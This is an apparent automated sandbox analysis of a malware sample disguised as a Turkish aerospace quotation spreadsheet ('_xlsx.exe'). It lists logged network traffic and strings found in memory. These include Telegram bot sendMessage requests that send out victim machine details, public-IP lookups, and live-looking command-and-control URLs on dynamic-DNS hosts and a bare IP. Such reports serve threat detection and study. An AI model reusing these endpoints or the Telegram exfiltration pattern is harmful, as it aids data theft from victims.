Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:18:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:48:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 13:14:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 13:14:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000003.00000002.2204333625.0000000006F60000.00000004.00000020.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3399202891.0000000006880000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2182151240.0000000003117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2193534020.0000000004661000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2226842794.0000000003387000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xSjByRHuwGV.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.2193534020.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000031D6000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003207000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000031C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003202000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000003.00000002.2193534020.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2193534020.0000000004DE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2193534020.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2199848529.00000000056C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.000000000312F000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.000000000308F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.000000000308F000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: xSjByRHuwGV.exe, 0000000F.00000002.3384233023.000000000308F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003156000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.000000000312F000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003127000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.00000000030B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.0000000004093000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3393608177.000000000437E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.000000000434E000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3392833347.0000000004061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003207000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 0000000A.00000002.3385197213.0000000003233000.00000004.00000800.00020000.00000000.sdmp, xSjByRHuwGV.exe, 0000000F.00000002.3384233023.0000000003202000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
